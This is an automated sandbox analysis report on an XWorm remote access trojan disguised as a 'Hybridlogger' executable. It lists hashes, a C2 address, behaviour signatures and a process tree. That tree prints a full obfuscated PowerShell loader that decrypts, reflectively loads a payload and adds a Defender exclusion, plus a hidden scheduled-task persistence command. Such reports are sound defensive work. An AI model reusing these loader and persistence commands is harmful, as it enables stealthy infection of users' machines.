xworm | 9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

Analysis

max time kernel
590s
max time network
598s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
26/01/2025, 08:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HybridloggerV5.5 (1).exe
Size

937KB
MD5

c9314841cdbf8522e9ee925039d3bfb7
SHA1

1b851459626862fdae6bdc0dd30aadf7a0f905ee
SHA256

9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7
SHA512

fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0
SSDEEP

24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

193.161.193.99:24469

Attributes

Install_directory
%Temp%
install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3584-50-0x0000013C3F3F0000-0x0000013C3F406000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 46 IoCs

flow	pid	Process
2	3584	powershell.exe
4	3584	powershell.exe
5	3584	powershell.exe
6	3584	powershell.exe
7	3584	powershell.exe
8	3584	powershell.exe
9	3584	powershell.exe
11	3584	powershell.exe
12	3584	powershell.exe
13	3584	powershell.exe
14	3584	powershell.exe
15	3584	powershell.exe
16	3584	powershell.exe
17	3584	powershell.exe
18	3584	powershell.exe
19	3584	powershell.exe
20	3584	powershell.exe
21	3584	powershell.exe
22	3584	powershell.exe
23	3584	powershell.exe
24	3584	powershell.exe
25	3584	powershell.exe
32	3584	powershell.exe
33	3584	powershell.exe
34	3584	powershell.exe
35	3584	powershell.exe
38	3584	powershell.exe
39	3584	powershell.exe
40	3584	powershell.exe
41	3584	powershell.exe
43	3584	powershell.exe
44	3584	powershell.exe
45	3584	powershell.exe
46	3584	powershell.exe
47	3584	powershell.exe
48	3584	powershell.exe
49	3584	powershell.exe
50	3584	powershell.exe
51	3584	powershell.exe
52	3584	powershell.exe
53	3584	powershell.exe
54	3584	powershell.exe
55	3584	powershell.exe
56	3584	powershell.exe
57	3584	powershell.exe
58	3584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3760	powershell.exe
1972	powershell.exe
3584	powershell.exe
3760	powershell.exe
3584	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSystem.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSystem.lnk	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3760	powershell.exe
3760	powershell.exe
1972	powershell.exe
1972	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe
Token: 35	1972	powershell.exe
Token: 36	1972	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe
Token: 35	1972	powershell.exe
Token: 36	1972	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe
Token: 35	1972	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3584	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 4832	2412	HybridloggerV5.5 (1).exe	78
PID 2412 wrote to memory of 4832	2412	HybridloggerV5.5 (1).exe	78
PID 2412 wrote to memory of 1488	2412	HybridloggerV5.5 (1).exe	80
PID 2412 wrote to memory of 1488	2412	HybridloggerV5.5 (1).exe	80
PID 4832 wrote to memory of 960	4832	cmd.exe	82
PID 4832 wrote to memory of 960	4832	cmd.exe	82
PID 1488 wrote to memory of 4660	1488	cmd.exe	83
PID 1488 wrote to memory of 4660	1488	cmd.exe	83
PID 4660 wrote to memory of 1152	4660	net.exe	84
PID 4660 wrote to memory of 1152	4660	net.exe	84
PID 1488 wrote to memory of 3760	1488	cmd.exe	85
PID 1488 wrote to memory of 3760	1488	cmd.exe	85
PID 3760 wrote to memory of 1972	3760	powershell.exe	87
PID 3760 wrote to memory of 1972	3760	powershell.exe	87
PID 3760 wrote to memory of 952	3760	powershell.exe	89
PID 3760 wrote to memory of 952	3760	powershell.exe	89
PID 952 wrote to memory of 2528	952	WScript.exe	90
PID 952 wrote to memory of 2528	952	WScript.exe	90
PID 2528 wrote to memory of 4572	2528	cmd.exe	92
PID 2528 wrote to memory of 4572	2528	cmd.exe	92
PID 4572 wrote to memory of 3964	4572	net.exe	93
PID 4572 wrote to memory of 3964	4572	net.exe	93
PID 2528 wrote to memory of 3584	2528	cmd.exe	94
PID 2528 wrote to memory of 3584	2528	cmd.exe	94

C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5 (1).exe
"C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5 (1).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4832
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1488
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:1152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_901_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_901.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1972
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_901.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:952
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_901.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2528
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4572
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:3964
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_901.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4fc204cd72f2c3f6149d487b16ea4a83

SHA1
ac5f7fae2c1ac704ad559069589844a89c0b7410

SHA256
dc706e6f21d6e4b670e36f3ed9772fef5f47d30af28f587f14ccd2f6348d14d8

SHA512
d6e90367ab4efcc2364ac7ad18763ba79b3f5ac638cefd1ec651bee9e9b6d3753b24e41bf774ce400024f1befd3b33e33fc89f0ec836e8e8256a39719a303ac4

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat

Filesize
12KB

MD5
89a22d3791ca38666c8144725a74497d

SHA1
96b672089a3c783e4dd27e8da7c0cc1245d55cfd

SHA256
9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

SHA512
6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat

Filesize
910KB

MD5
72ecd938d114e246eeebc8ae430fc2e9

SHA1
9ece59be22ceadcb3951093483cc69a76658801d

SHA256
4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

SHA512
d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ewp133a.qdi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_901.vbs

Filesize
115B

MD5
81c4ae07dea61c76492cb2b8d1257ec0

SHA1
da26d94a81735088e17e058e1e87c6006d3b7b65

SHA256
f370a3994c7d5e18929c28d669a1b105dee7b3a5c01ecce7899c742a71164640

SHA512
2af5fedaae09b581cb5c16b72a08e1fb927232d450e618d0f6af5a78f1b22e2c47516199918454e722fa8a9aa3b740d6c23d39d76912ef791f19f5c422acae4a

Download Submit
memory/2412-0-0x00007FFED75B3000-0x00007FFED75B5000-memory.dmp

Filesize
8KB

Download
memory/2412-1-0x00000000006A0000-0x0000000000790000-memory.dmp

Filesize
960KB

Download
memory/3584-50-0x0000013C3F3F0000-0x0000013C3F406000-memory.dmp

Filesize
88KB

Download
memory/3760-19-0x000001EB7A120000-0x000001EB7A142000-memory.dmp

Filesize
136KB

Download
memory/3760-20-0x000001EB7A110000-0x000001EB7A118000-memory.dmp

Filesize
32KB

Download
memory/3760-21-0x000001EB7A3E0000-0x000001EB7A418000-memory.dmp

Filesize
224KB

Download